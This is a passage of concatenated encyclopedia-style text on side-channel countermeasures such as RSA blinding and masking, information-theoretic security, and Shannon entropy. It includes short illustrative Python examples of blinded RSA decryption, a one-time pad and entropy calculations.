While these CPUs were intended to make timing and power attacks more difficult,[21]subsequent research found that timing variations in asynchronous circuits are harder to remove.[24] A typical example of the second category (decorrelation) is a technique known asblinding. In the case ofRSAdecryption with secret exponentd{\displaystyle d}and corresponding encryption exponente{\displaystyle e}and modulusm{\displaystyle m}, the technique applies as follows (for simplicity, the modular reduction bymis omitted in the formulas): before decrypting, that is, before computing the result ofyd{\displaystyle y^{d}}for a given ciphertexty{\displaystyle y}, the system picks a random numberr{\displaystyle r}and encrypts it with public exponente{\displaystyle e}to obtainre{\displaystyle r^{e}}. Then, the decryption is done ony⋅re{\displaystyle y\cdot r^{e}}to obtain(y⋅re)d=yd⋅re⋅d=yd⋅r{\displaystyle {(y\cdot r^{e})}^{d}=y^{d}\cdot r^{e\cdot d}=y^{d}\cdot r}. Since the decrypting system choser{\displaystyle r}, it can compute its inverse modulom{\displaystyle m}to cancel out the factorr{\displaystyle r}in the result and obtainyd{\displaystyle y^{d}}, the actual result of the decryption. For attacks that require collecting side-channel information from operations with datacontrolled by the attacker, blinding is an effective countermeasure, since the actual operation is executed on a randomized version of the data, over which the attacker has no control or even knowledge. A more general countermeasure (in that it is effective against all side-channel attacks) is the masking countermeasure. The principle of masking is to avoid manipulating any sensitive valuey{\displaystyle y}directly, but rather manipulate a sharing of it: a set of variables (called "shares")y1,...,yd{\displaystyle y_{1},...,y_{d}}such thaty=y1⊕...⊕yd{\displaystyle y=y_{1}\oplus ...\oplus y_{d}}(where⊕{\displaystyle \oplus }is theXORoperation). An attacker must recover all the values of the shares to get any meaningful information.[25] Recently, white-box modeling was utilized to develop a low-overhead generic circuit-level countermeasure[26]against both EM as well as power side-channel attacks. To minimize the effects of the higher-level metal layers in an IC acting as more efficient antennas,[27]the idea is to embed the crypto core with a signature suppression circuit,[28][29]routed locally within the lower-level metal layers, leading towards both power and EM side-channel attack immunity.
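The RSA blinding procedure just described can be sketched in a few lines of Python. The textbook-sized parameters below (p = 61, q = 53, e = 17, d = 2753) and the helper name blinded_decrypt are assumptions made purely for illustration; they offer no real security and are not any particular library's API.

```python
import secrets

# Toy RSA parameters (textbook-sized, for illustration only -- not secure).
p, q = 61, 53
m = p * q              # modulus, 3233
e = 17                 # public exponent
d = 2753               # private exponent: e*d = 1 modulo lcm(p-1, q-1)

def blinded_decrypt(y: int) -> int:
    # Pick a random blinding factor r that is invertible modulo m.
    while True:
        r = secrets.randbelow(m - 2) + 2
        try:
            r_inv = pow(r, -1, m)          # modular inverse (Python 3.8+)
            break
        except ValueError:                 # r not coprime to m; retry
            continue
    blinded = (y * pow(r, e, m)) % m       # y * r^e
    result = pow(blinded, d, m)            # (y * r^e)^d = y^d * r  (mod m)
    return (result * r_inv) % m            # strip the blinding factor r

ciphertext = pow(65, e, m)                 # encrypt the message 65
print(blinded_decrypt(ciphertext))         # 65
```

The sensitive exponentiation with d is performed on y·r^e, a value the attacker neither chooses nor knows, which is the point of the countermeasure.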
https://en.wikipedia.org/wiki/Side-channel_attack
A cryptosystem is considered to have information-theoretic security (also called unconditional security[1]) if the system is secure against adversaries with unlimited computing resources and time. In contrast, a system which depends on the computational cost of cryptanalysis to be secure (and thus can be broken by an attack with unlimited computation) is called computationally secure or conditionally secure.[2] An encryption protocol with information-theoretic security is impossible to break even with infinite computational power. Protocols proven to be information-theoretically secure are resistant to future developments in computing. The concept of information-theoretically secure communication was introduced in 1949 by American mathematician Claude Shannon, one of the founders of classical information theory, who used it to prove the one-time pad system was secure.[3] Information-theoretically secure cryptosystems have been used for the most sensitive governmental communications, such as diplomatic cables and high-level military communications.[citation needed] There are a variety of cryptographic tasks for which information-theoretic security is a meaningful and useful requirement; examples include the one-time pad and the secret key agreement schemes discussed below. Algorithms which are computationally or conditionally secure (i.e., they are not information-theoretically secure) are dependent on resource limits. For example, RSA relies on the assertion that factoring large numbers is hard. A weaker notion of security, defined by Aaron D. Wyner, established a now-flourishing area of research known as physical layer encryption.[4] It secures the physical wireless channel by communications, signal processing, and coding techniques. The security is provable, unbreakable, and quantifiable (in bits/second/hertz). Wyner's initial physical layer encryption work in the 1970s posed the Alice–Bob–Eve problem in which Alice wants to send a message to Bob without Eve decoding it. It was shown that if the channel from Alice to Bob is statistically better than the channel from Alice to Eve, secure communication is possible.[5] That is intuitive, but Wyner measured the secrecy in information-theoretic terms, defining the secrecy capacity, which essentially is the rate at which Alice can transmit secret information to Bob. Shortly afterward, Imre Csiszár and Körner showed that secret communication was possible even if Eve had a statistically better channel to Alice than Bob did.[6] The basic idea of the information-theoretic approach to securely transmitting confidential messages (without using an encryption key) to a legitimate receiver is to use the inherent randomness of the physical medium (including noise and channel fluctuations due to fading) and exploit the difference between the channel to the legitimate receiver and the channel to the eavesdropper to benefit the legitimate receiver.[7] More recent theoretical results are concerned with determining the secrecy capacity and optimal power allocation in broadcast fading channels.[8][9] There are caveats, as many capacities are not computable unless the assumption is made that Alice knows the channel to Eve. If that were known, Alice could simply place a null in Eve's direction. Secrecy capacity for MIMO and multiple colluding eavesdroppers is more recent and ongoing work,[10][11] and such results still make the unhelpful assumption that the eavesdropper's channel state information is fully known. Still other work is less theoretical, attempting to compare implementable schemes.
One physical layer encryption scheme is to broadcast artificial noise in all directions except that of Bob's channel, which basically jams Eve. One paper by Negi and Goel details its implementation, and Khisti and Wornell computed the secrecy capacity when only statistics about Eve's channel are known.[12][13] Parallel to that work in the information theory community is work in the antenna community, which has been termed near-field direct antenna modulation or directional modulation.[14]It has been shown that by using aparasitic array, the transmitted modulation in different directions could be controlled independently.[15]Secrecy could be realized by making the modulations in undesired directions difficult to decode. Directional modulation data transmission was experimentally demonstrated using aphased array.[16]Others have demonstrated directional modulation withswitched arraysandphase-conjugating lenses.[17][18][19] That type of directional modulation is really a subset of Negi and Goel's additive artificial noise encryption scheme. Another scheme usingpattern-reconfigurabletransmit antennas for Alice called reconfigurablemultiplicative noise(RMN) complements additive artificial noise.[20]The two work well together in channel simulations in which nothing is assumed known to Alice or Bob about the eavesdroppers. The different works mentioned in the previous part employ, in one way or another, the randomness present in the wireless channel to transmit information-theoretically secure messages. Conversely, we could analyze how much secrecy one can extract from the randomness itself in the form of asecret key. That is the goal ofsecret key agreement. In this line of work, started by Maurer[21]and Ahlswede and Csiszár,[22]the basic system model removes any restriction on the communication schemes and assumes that the legitimate users can communicate over a two-way, public, noiseless, and authenticated channel at no cost. This model has been subsequently extended to account for multiple users[23]and a noisy channel[24]among others.
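A minimal sketch of the one-time pad mentioned at the start of this section, the canonical information-theoretically secure scheme: encryption is bitwise XOR with a uniformly random key that is as long as the message and never reused. The final assertion illustrates perfect secrecy informally: for any candidate plaintext of the same length there exists a key consistent with the observed ciphertext, so the ciphertext alone reveals nothing about which plaintext was sent. The messages below are arbitrary examples.

```python
import secrets

def otp_xor(data: bytes, key: bytes) -> bytes:
    # One-time pad: XOR with a truly random, equally long, never-reused key.
    assert len(key) == len(data)
    return bytes(d ^ k for d, k in zip(data, key))

message = b"attack at dawn"
key = secrets.token_bytes(len(message))          # uniformly random one-time key
ciphertext = otp_xor(message, key)
assert otp_xor(ciphertext, key) == message       # XOR is its own inverse

# Perfect secrecy, informally: any same-length candidate plaintext is
# consistent with this ciphertext under some key.
candidate = b"defend at dusk"
key_that_fits = bytes(c ^ d for c, d in zip(ciphertext, candidate))
assert otp_xor(candidate, key_that_fits) == ciphertext
```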
https://en.wikipedia.org/wiki/Perfect_secrecy
Ininformation theory, theentropyof arandom variablequantifies the average level of uncertainty or information associated with the variable's potential states or possible outcomes. This measures the expected amount of information needed to describe the state of the variable, considering the distribution of probabilities across all potential states. Given a discrete random variableX{\displaystyle X}, which may be any memberx{\displaystyle x}within the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p\colon {\mathcal {X}}\to [0,1]}, the entropy isH(X):=−∑x∈Xp(x)log⁡p(x),{\displaystyle \mathrm {H} (X):=-\sum _{x\in {\mathcal {X}}}p(x)\log p(x),}whereΣ{\displaystyle \Sigma }denotes the sum over the variable's possible values.[Note 1]The choice of base forlog{\displaystyle \log }, thelogarithm, varies for different applications. Base 2 gives the unit ofbits(or "shannons"), while baseegives "natural units"nat, and base 10 gives units of "dits", "bans", or "hartleys". An equivalent definition of entropy is theexpected valueof theself-informationof a variable.[1] The concept of information entropy was introduced byClaude Shannonin his 1948 paper "A Mathematical Theory of Communication",[2][3]and is also referred to asShannon entropy. Shannon's theory defines adata communicationsystem composed of three elements: a source of data, acommunication channel, and a receiver. The "fundamental problem of communication" – as expressed by Shannon – is for the receiver to be able to identify what data was generated by the source, based on the signal it receives through the channel.[2][3]Shannon considered various ways to encode, compress, and transmit messages from a data source, and proved in hissource coding theoremthat the entropy represents an absolute mathematical limit on how well data from the source can belosslesslycompressed onto a perfectly noiseless channel. Shannon strengthened this result considerably for noisy channels in hisnoisy-channel coding theorem. Entropy in information theory is directly analogous to theentropyinstatistical thermodynamics. The analogy results when the values of the random variable designate energies of microstates, so Gibbs's formula for the entropy is formally identical to Shannon's formula. Entropy has relevance to other areas of mathematics such ascombinatoricsandmachine learning. The definition can be derived from a set ofaxiomsestablishing that entropy should be a measure of how informative the average outcome of a variable is. For a continuous random variable,differential entropyis analogous to entropy. The definitionE[−log⁡p(X)]{\displaystyle \mathbb {E} [-\log p(X)]}generalizes the above. The core idea of information theory is that the "informational value" of a communicated message depends on the degree to which the content of the message is surprising. If a highly likely event occurs, the message carries very little information. On the other hand, if a highly unlikely event occurs, the message is much more informative. For instance, the knowledge that some particular numberwill notbe the winning number of a lottery provides very little information, because any particular chosen number will almost certainly not win. However, knowledge that a particular numberwillwin a lottery has high informational value because it communicates the occurrence of a very low probability event. 
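As a small numerical sketch of this "informational value" idea, which the next passage formalizes as self-information or surprisal, the code below evaluates −log2 p for a nearly certain event and for a very unlikely one; the one-in-ten-million lottery odds are an arbitrary illustrative figure.

```python
import math

def surprisal_bits(p: float) -> float:
    # Self-information of an event with probability p, in bits: -log2(p).
    return -math.log2(p)

# A particular ticket NOT winning a 1-in-10-million lottery: almost certain,
# so observing it carries almost no information.
print(surprisal_bits(1 - 1e-7))   # ~1.4e-7 bits
# The same ticket winning: extremely unlikely, hence highly informative.
print(surprisal_bits(1e-7))       # ~23.25 bits
```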
Theinformation content,also called thesurprisalorself-information,of an eventE{\displaystyle E}is a function that increases as the probabilityp(E){\displaystyle p(E)}of an event decreases. Whenp(E){\displaystyle p(E)}is close to 1, the surprisal of the event is low, but ifp(E){\displaystyle p(E)}is close to 0, the surprisal of the event is high. This relationship is described by the functionlog⁡(1p(E)),{\displaystyle \log \left({\frac {1}{p(E)}}\right),}wherelog{\displaystyle \log }is thelogarithm, which gives 0 surprise when the probability of the event is 1.[4]In fact,logis the only function that satisfies а specific set of conditions defined in section§ Characterization. Hence, we can define the information, or surprisal, of an eventE{\displaystyle E}byI(E)=−log⁡(p(E)),{\displaystyle I(E)=-\log(p(E)),}or equivalently,I(E)=log⁡(1p(E)).{\displaystyle I(E)=\log \left({\frac {1}{p(E)}}\right).} Entropy measures the expected (i.e., average) amount of information conveyed by identifying the outcome of a random trial.[5]: 67This implies that rolling a die has higher entropy than tossing a coin because each outcome of a die toss has smaller probability (p=1/6{\displaystyle p=1/6}) than each outcome of a coin toss (p=1/2{\displaystyle p=1/2}). Consider a coin with probabilitypof landing on heads and probability1 −pof landing on tails. The maximum surprise is whenp= 1/2, for which one outcome is not expected over the other. In this case a coin flip has an entropy of onebit(similarly, onetritwith equiprobable values containslog2⁡3{\displaystyle \log _{2}3}(about 1.58496) bits of information because it can have one of three values). The minimum surprise is whenp= 0(impossibility) orp= 1(certainty) and the entropy is zero bits. When the entropy is zero, sometimes referred to as unity[Note 2], there is no uncertainty at all – no freedom of choice – noinformation.[6]Other values ofpgive entropies between zero and one bits. Information theory is useful to calculate the smallest amount of information required to convey a message, as indata compression. For example, consider the transmission of sequences comprising the 4 characters 'A', 'B', 'C', and 'D' over a binary channel. If all 4 letters are equally likely (25%), one cannot do better than using two bits to encode each letter. 'A' might code as '00', 'B' as '01', 'C' as '10', and 'D' as '11'. However, if the probabilities of each letter are unequal, say 'A' occurs with 70% probability, 'B' with 26%, and 'C' and 'D' with 2% each, one could assign variable length codes. In this case, 'A' would be coded as '0', 'B' as '10', 'C' as '110', and 'D' as '111'. With this representation, 70% of the time only one bit needs to be sent, 26% of the time two bits, and only 4% of the time 3 bits. On average, fewer than 2 bits are required since the entropy is lower (owing to the high prevalence of 'A' followed by 'B' – together 96% of characters). The calculation of the sum of probability-weighted log probabilities measures and captures this effect. English text, treated as a string of characters, has fairly low entropy; i.e. it is fairly predictable. We can be fairly certain that, for example, 'e' will be far more common than 'z', that the combination 'qu' will be much more common than any other combination with a 'q' in it, and that the combination 'th' will be more common than 'z', 'q', or 'qu'. After the first few letters one can often guess the rest of the word. 
English text has between 0.6 and 1.3 bits of entropy per character of the message.[7]: 234 Named afterBoltzmann's Η-theorem, Shannon defined the entropyΗ(Greek capital lettereta) of adiscrete random variableX{\textstyle X}, which takes values in the setX{\displaystyle {\mathcal {X}}}and is distributed according top:X→[0,1]{\displaystyle p:{\mathcal {X}}\to [0,1]}such thatp(x):=P[X=x]{\displaystyle p(x):=\mathbb {P} [X=x]}: H(X)=E[I⁡(X)]=E[−log⁡p(X)].{\displaystyle \mathrm {H} (X)=\mathbb {E} [\operatorname {I} (X)]=\mathbb {E} [-\log p(X)].} HereE{\displaystyle \mathbb {E} }is theexpected value operator, andIis theinformation contentofX.[8]: 11[9]: 19–20I⁡(X){\displaystyle \operatorname {I} (X)}is itself a random variable. The entropy can explicitly be written as:H(X)=−∑x∈Xp(x)logb⁡p(x),{\displaystyle \mathrm {H} (X)=-\sum _{x\in {\mathcal {X}}}p(x)\log _{b}p(x),}wherebis thebase of the logarithmused. Common values ofbare 2,Euler's numbere, and 10, and the corresponding units of entropy are thebitsforb= 2,natsforb=e, andbansforb= 10.[10] In the case ofp(x)=0{\displaystyle p(x)=0}for somex∈X{\displaystyle x\in {\mathcal {X}}}, the value of the corresponding summand0 logb(0)is taken to be0, which is consistent with thelimit:[11]: 13limp→0+plog⁡(p)=0.{\displaystyle \lim _{p\to 0^{+}}p\log(p)=0.} One may also define theconditional entropyof two variablesX{\displaystyle X}andY{\displaystyle Y}taking values from setsX{\displaystyle {\mathcal {X}}}andY{\displaystyle {\mathcal {Y}}}respectively, as:[11]: 16H(X|Y)=−∑x,y∈X×YpX,Y(x,y)log⁡pX,Y(x,y)pY(y),{\displaystyle \mathrm {H} (X|Y)=-\sum _{x,y\in {\mathcal {X}}\times {\mathcal {Y}}}p_{X,Y}(x,y)\log {\frac {p_{X,Y}(x,y)}{p_{Y}(y)}},}wherepX,Y(x,y):=P[X=x,Y=y]{\displaystyle p_{X,Y}(x,y):=\mathbb {P} [X=x,Y=y]}andpY(y)=P[Y=y]{\displaystyle p_{Y}(y)=\mathbb {P} [Y=y]}. This quantity should be understood as the remaining randomness in the random variableX{\displaystyle X}given the random variableY{\displaystyle Y}. Entropy can be formally defined in the language ofmeasure theoryas follows:[12]Let(X,Σ,μ){\displaystyle (X,\Sigma ,\mu )}be aprobability space. LetA∈Σ{\displaystyle A\in \Sigma }be anevent. ThesurprisalofA{\displaystyle A}isσμ(A)=−ln⁡μ(A).{\displaystyle \sigma _{\mu }(A)=-\ln \mu (A).} Theexpectedsurprisal ofA{\displaystyle A}ishμ(A)=μ(A)σμ(A).{\displaystyle h_{\mu }(A)=\mu (A)\sigma _{\mu }(A).} Aμ{\displaystyle \mu }-almostpartitionis aset familyP⊆P(X){\displaystyle P\subseteq {\mathcal {P}}(X)}such thatμ(∪⁡P)=1{\displaystyle \mu (\mathop {\cup } P)=1}andμ(A∩B)=0{\displaystyle \mu (A\cap B)=0}for all distinctA,B∈P{\displaystyle A,B\in P}. (This is a relaxation of the usual conditions for a partition.) The entropy ofP{\displaystyle P}isHμ(P)=∑A∈Phμ(A).{\displaystyle \mathrm {H} _{\mu }(P)=\sum _{A\in P}h_{\mu }(A).} LetM{\displaystyle M}be asigma-algebraonX{\displaystyle X}. The entropy ofM{\displaystyle M}isHμ(M)=supP⊆MHμ(P).{\displaystyle \mathrm {H} _{\mu }(M)=\sup _{P\subseteq M}\mathrm {H} _{\mu }(P).}Finally, the entropy of the probability space isHμ(Σ){\displaystyle \mathrm {H} _{\mu }(\Sigma )}, that is, the entropy with respect toμ{\displaystyle \mu }of the sigma-algebra ofallmeasurable subsets ofX{\displaystyle X}. 
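Applying the definition just given, the following short sketch recomputes the two sources described earlier (four equally likely letters, and the skewed 70/26/2/2 source) and the average length of the variable-length code assigned there; the numbers are taken from that example.

```python
import math

def entropy_bits(probs):
    # H(X) = -sum p(x) * log2 p(x), with 0*log(0) taken as 0.
    return -sum(p * math.log2(p) for p in probs if p > 0)

# Four equally likely letters: 2 bits per symbol, so fixed 2-bit codes are optimal.
print(entropy_bits([0.25, 0.25, 0.25, 0.25]))            # 2.0

# Skewed source: 'A' 70%, 'B' 26%, 'C' and 'D' 2% each.
skewed = [0.70, 0.26, 0.02, 0.02]
print(entropy_bits(skewed))                              # ~1.09 bits per symbol

# Average length of the variable-length code '0', '10', '110', '111':
print(sum(p * l for p, l in zip(skewed, [1, 2, 3, 3])))  # 1.34 bits, below 2
```

As expected, the average code length (1.34 bits) lies above the entropy (about 1.09 bits) but well below the 2 bits needed with fixed-length codes.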
Recent studies on layered dynamical systems have introduced the concept of symbolic conditional entropy, further extending classical entropy measures to more abstract informational structures.[13] Consider tossing a coin with known, not necessarily fair, probabilities of coming up heads or tails; this can be modeled as aBernoulli process. The entropy of the unknown result of the next toss of the coin is maximized if the coin is fair (that is, if heads and tails both have equal probability 1/2). This is the situation of maximum uncertainty as it is most difficult to predict the outcome of the next toss; the result of each toss of the coin delivers one full bit of information. This is becauseH(X)=−∑i=1np(xi)logb⁡p(xi)=−∑i=1212log2⁡12=−∑i=1212⋅(−1)=1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-\sum _{i=1}^{n}{p(x_{i})\log _{b}p(x_{i})}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\log _{2}{\frac {1}{2}}}\\&=-\sum _{i=1}^{2}{{\frac {1}{2}}\cdot (-1)}=1.\end{aligned}}} However, if we know the coin is not fair, but comes up heads or tails with probabilitiespandq, wherep≠q, then there is less uncertainty. Every time it is tossed, one side is more likely to come up than the other. The reduced uncertainty is quantified in a lower entropy: on average each toss of the coin delivers less than one full bit of information. For example, ifp= 0.7, thenH(X)=−plog2⁡p−qlog2⁡q=−0.7log2⁡(0.7)−0.3log2⁡(0.3)≈−0.7⋅(−0.515)−0.3⋅(−1.737)=0.8816<1.{\displaystyle {\begin{aligned}\mathrm {H} (X)&=-p\log _{2}p-q\log _{2}q\\[1ex]&=-0.7\log _{2}(0.7)-0.3\log _{2}(0.3)\\[1ex]&\approx -0.7\cdot (-0.515)-0.3\cdot (-1.737)\\[1ex]&=0.8816<1.\end{aligned}}} Uniform probability yields maximum uncertainty and therefore maximum entropy. Entropy, then, can only decrease from the value associated with uniform probability. The extreme case is that of a double-headed coin that never comes up tails, or a double-tailed coin that never results in a head. Then there is no uncertainty. The entropy is zero: each toss of the coin delivers no new information as the outcome of each coin toss is always certain.[11]: 14–15 To understand the meaning of−Σpilog(pi), first define an information functionIin terms of an eventiwith probabilitypi. The amount of information acquired due to the observation of eventifollows from Shannon's solution of the fundamental properties ofinformation:[14] Given two independent events, if the first event can yield one ofnequiprobableoutcomes and another has one ofmequiprobable outcomes then there aremnequiprobable outcomes of the joint event. This means that iflog2(n)bits are needed to encode the first value andlog2(m)to encode the second, one needslog2(mn) = log2(m) + log2(n)to encode both. Shannon discovered that a suitable choice ofI{\displaystyle \operatorname {I} }is given by:[15]I⁡(p)=log⁡(1p)=−log⁡(p).{\displaystyle \operatorname {I} (p)=\log \left({\tfrac {1}{p}}\right)=-\log(p).} In fact, the only possible values ofI{\displaystyle \operatorname {I} }areI⁡(u)=klog⁡u{\displaystyle \operatorname {I} (u)=k\log u}fork<0{\displaystyle k<0}. Additionally, choosing a value forkis equivalent to choosing a valuex>1{\displaystyle x>1}fork=−1/log⁡x{\displaystyle k=-1/\log x}, so thatxcorresponds to thebase for the logarithm. Thus, entropy ischaracterizedby the above four properties. 
I⁡(p1p2)=I⁡(p1)+I⁡(p2)Starting from property 3p2I′⁡(p1p2)=I′⁡(p1)taking the derivative w.r.tp1I′⁡(p1p2)+p1p2I″⁡(p1p2)=0taking the derivative w.r.tp2I′⁡(u)+uI″⁡(u)=0introducingu=p1p2(uI′⁡(u))′=0combining terms into oneuI′⁡(u)−k=0integrating w.r.tu,producing constantk{\displaystyle {\begin{aligned}&\operatorname {I} (p_{1}p_{2})&=\ &\operatorname {I} (p_{1})+\operatorname {I} (p_{2})&&\quad {\text{Starting from property 3}}\\&p_{2}\operatorname {I} '(p_{1}p_{2})&=\ &\operatorname {I} '(p_{1})&&\quad {\text{taking the derivative w.r.t}}\ p_{1}\\&\operatorname {I} '(p_{1}p_{2})+p_{1}p_{2}\operatorname {I} ''(p_{1}p_{2})&=\ &0&&\quad {\text{taking the derivative w.r.t}}\ p_{2}\\&\operatorname {I} '(u)+u\operatorname {I} ''(u)&=\ &0&&\quad {\text{introducing}}\,u=p_{1}p_{2}\\&(u\operatorname {I} '(u))'&=\ &0&&\quad {\text{combining terms into one}}\ \\&u\operatorname {I} '(u)-k&=\ &0&&\quad {\text{integrating w.r.t}}\ u,{\text{producing constant}}\,k\\\end{aligned}}} Thisdifferential equationleads to the solutionI⁡(u)=klog⁡u+c{\displaystyle \operatorname {I} (u)=k\log u+c}for somek,c∈R{\displaystyle k,c\in \mathbb {R} }. Property 2 givesc=0{\displaystyle c=0}. Property 1 and 2 give thatI⁡(p)≥0{\displaystyle \operatorname {I} (p)\geq 0}for allp∈[0,1]{\displaystyle p\in [0,1]}, so thatk<0{\displaystyle k<0}. The differentunits of information(bitsfor thebinary logarithmlog2,natsfor thenatural logarithmln,bansfor thedecimal logarithmlog10and so on) areconstant multiplesof each other. For instance, in case of a fair coin toss, heads provideslog2(2) = 1bit of information, which is approximately 0.693 nats or 0.301 decimal digits. Because of additivity,ntosses providenbits of information, which is approximately0.693nnats or0.301ndecimal digits. Themeaningof the events observed (the meaning ofmessages) does not matter in the definition of entropy. Entropy only takes into account the probability of observing a specific event, so the information it encapsulates is information about the underlyingprobability distribution, not the meaning of the events themselves. Another characterization of entropy uses the following properties. We denotepi= Pr(X=xi)andΗn(p1, ...,pn) = Η(X). The rule of additivity has the following consequences: forpositive integersbiwhereb1+ ... +bk=n,Hn(1n,…,1n)=Hk(b1n,…,bkn)+∑i=1kbinHbi(1bi,…,1bi).{\displaystyle \mathrm {H} _{n}\left({\frac {1}{n}},\ldots ,{\frac {1}{n}}\right)=\mathrm {H} _{k}\left({\frac {b_{1}}{n}},\ldots ,{\frac {b_{k}}{n}}\right)+\sum _{i=1}^{k}{\frac {b_{i}}{n}}\,\mathrm {H} _{b_{i}}\left({\frac {1}{b_{i}}},\ldots ,{\frac {1}{b_{i}}}\right).} Choosingk=n,b1= ... =bn= 1this implies that the entropy of a certain outcome is zero:Η1(1) = 0. This implies that the efficiency of a source set withnsymbols can be defined simply as being equal to itsn-ary entropy. See alsoRedundancy (information theory). The characterization here imposes an additive property with respect to apartition of a set. Meanwhile, theconditional probabilityis defined in terms of a multiplicative property,P(A∣B)⋅P(B)=P(A∩B){\displaystyle P(A\mid B)\cdot P(B)=P(A\cap B)}. Observe that a logarithm mediates between these two operations. Theconditional entropyand related quantities inherit simple relation, in turn. The measure theoretic definition in the previous section defined the entropy as a sum over expected surprisalsμ(A)⋅ln⁡μ(A){\displaystyle \mu (A)\cdot \ln \mu (A)}for an extremal partition. Here the logarithm is ad hoc and the entropy is not a measure in itself. 
At least in the information theory of a binary string,log2{\displaystyle \log _{2}}lends itself to practical interpretations. Motivated by such relations, a plethora of related and competing quantities have been defined. For example,David Ellerman's analysis of a "logic of partitions" defines a competing measure in structuresdualto that of subsets of a universal set.[16]Information is quantified as "dits" (distinctions), a measure on partitions. "Dits" can be converted intoShannon's bits, to get the formulas for conditional entropy, and so on. Another succinct axiomatic characterization of Shannon entropy was given byAczél, Forte and Ng,[17]via the following properties: It was shown that any functionH{\displaystyle \mathrm {H} }satisfying the above properties must be a constant multiple of Shannon entropy, with a non-negative constant.[17]Compared to the previously mentioned characterizations of entropy, this characterization focuses on the properties of entropy as a function of random variables (subadditivity and additivity), rather than the properties of entropy as a function of the probability vectorp1,…,pn{\displaystyle p_{1},\ldots ,p_{n}}. It is worth noting that if we drop the "small for small probabilities" property, thenH{\displaystyle \mathrm {H} }must be a non-negative linear combination of the Shannon entropy and theHartley entropy.[17] The Shannon entropy satisfies the following properties, for some of which it is useful to interpret entropy as the expected amount of information learned (or uncertainty eliminated) by revealing the value of a random variableX: The inspiration for adopting the wordentropyin information theory came from the close resemblance between Shannon's formula and very similar known formulae fromstatistical mechanics. Instatistical thermodynamicsthe most general formula for the thermodynamicentropySof athermodynamic systemis theGibbs entropyS=−kB∑ipiln⁡pi,{\displaystyle S=-k_{\text{B}}\sum _{i}p_{i}\ln p_{i}\,,}wherekBis theBoltzmann constant, andpiis the probability of amicrostate. TheGibbs entropywas defined byJ. Willard Gibbsin 1878 after earlier work byLudwig Boltzmann(1872).[18] The Gibbs entropy translates over almost unchanged into the world ofquantum physicsto give thevon Neumann entropyintroduced byJohn von Neumannin 1927:S=−kBTr(ρln⁡ρ),{\displaystyle S=-k_{\text{B}}\,{\rm {Tr}}(\rho \ln \rho )\,,}where ρ is thedensity matrixof the quantum mechanical system and Tr is thetrace.[19] At an everyday practical level, the links between information entropy and thermodynamic entropy are not evident. Physicists and chemists are apt to be more interested inchangesin entropy as a system spontaneously evolves away from its initial conditions, in accordance with thesecond law of thermodynamics, rather than an unchanging probability distribution. As the minuteness of the Boltzmann constantkBindicates, the changes inS/kBfor even tiny amounts of substances in chemical and physical processes represent amounts of entropy that are extremely large compared to anything indata compressionorsignal processing. In classical thermodynamics, entropy is defined in terms of macroscopic measurements and makes no reference to any probability distribution, which is central to the definition of information entropy. 
The connection between thermodynamics and what is now known as information theory was first made by Boltzmann and expressed by hisequation: S=kBln⁡W,{\displaystyle S=k_{\text{B}}\ln W,} whereS{\displaystyle S}is the thermodynamic entropy of a particular macrostate (defined by thermodynamic parameters such as temperature, volume, energy, etc.),Wis the number of microstates (various combinations of particles in various energy states) that can yield the given macrostate, andkBis the Boltzmann constant.[20]It is assumed that each microstate is equally likely, so that the probability of a given microstate ispi= 1/W. When these probabilities are substituted into the above expression for the Gibbs entropy (or equivalentlykBtimes the Shannon entropy), Boltzmann's equation results. In information theoretic terms, the information entropy of a system is the amount of "missing" information needed to determine a microstate, given the macrostate. In the view ofJaynes(1957),[21]thermodynamic entropy, as explained bystatistical mechanics, should be seen as anapplicationof Shannon's information theory: the thermodynamic entropy is interpreted as being proportional to the amount of further Shannon information needed to define the detailed microscopic state of the system, that remains uncommunicated by a description solely in terms of the macroscopic variables of classical thermodynamics, with the constant of proportionality being just the Boltzmann constant. Adding heat to a system increases its thermodynamic entropy because it increases the number of possible microscopic states of the system that are consistent with the measurable values of its macroscopic variables, making any complete state description longer. (See article:maximum entropy thermodynamics).Maxwell's demoncan (hypothetically) reduce the thermodynamic entropy of a system by using information about the states of individual molecules; but, asLandauer(from 1961) and co-workers[22]have shown, to function the demon himself must increase thermodynamic entropy in the process, by at least the amount of Shannon information he proposes to first acquire and store; and so the total thermodynamic entropy does not decrease (which resolves the paradox).Landauer's principleimposes a lower bound on the amount of heat a computer must generate to process a given amount of information, though modern computers are far less efficient. Shannon's definition of entropy, when applied to an information source, can determine the minimum channel capacity required to reliably transmit the source as encoded binary digits. Shannon's entropy measures the information contained in a message as opposed to the portion of the message that is determined (or predictable). Examples of the latter include redundancy in language structure or statistical properties relating to the occurrence frequencies of letter or word pairs, triplets etc. The minimum channel capacity can be realized in theory by using thetypical setor in practice usingHuffman,Lempel–Zivorarithmetic coding. (See alsoKolmogorov complexity.) In practice, compression algorithms deliberately include some judicious redundancy in the form ofchecksumsto protect against errors. Theentropy rateof a data source is the average number of bits per symbol needed to encode it. Shannon's experiments with human predictors show an information rate between 0.6 and 1.3 bits per character in English;[23]thePPM compression algorithmcan achieve a compression ratio of 1.5 bits per character in English text. 
If acompressionscheme is lossless – one in which you can always recover the entire original message by decompression – then a compressed message has the same quantity of information as the original but is communicated in fewer characters. It has more information (higher entropy) per character. A compressed message has lessredundancy.Shannon's source coding theoremstates a lossless compression scheme cannot compress messages, on average, to havemorethan one bit of information per bit of message, but that any valuelessthan one bit of information per bit of message can be attained by employing a suitable coding scheme. The entropy of a message per bit multiplied by the length of that message is a measure of how much total information the message contains. Shannon's theorem also implies that no lossless compression scheme can shortenallmessages. If some messages come out shorter, at least one must come out longer due to thepigeonhole principle. In practical use, this is generally not a problem, because one is usually only interested in compressing certain types of messages, such as a document in English, as opposed to gibberish text, or digital photographs rather than noise, and it is unimportant if a compression algorithm makes some unlikely or uninteresting sequences larger. A 2011 study inScienceestimates the world's technological capacity to store and communicate optimally compressed information normalized on the most effective compression algorithms available in the year 2007, therefore estimating the entropy of the technologically available sources.[24]: 60–65 The authors estimate humankind technological capacity to store information (fully entropically compressed) in 1986 and again in 2007. They break the information into three categories—to store information on a medium, to receive information through one-waybroadcastnetworks, or to exchange information through two-waytelecommunications networks.[24] Entropy is one of several ways to measure biodiversity and is applied in the form of theShannon index.[25]A diversity index is a quantitative statistical measure of how many different types exist in a dataset, such as species in a community, accounting for ecologicalrichness,evenness, anddominance. Specifically, Shannon entropy is the logarithm of1D, thetrue diversityindex with parameter equal to 1. The Shannon index is related to the proportional abundances of types. There are a number of 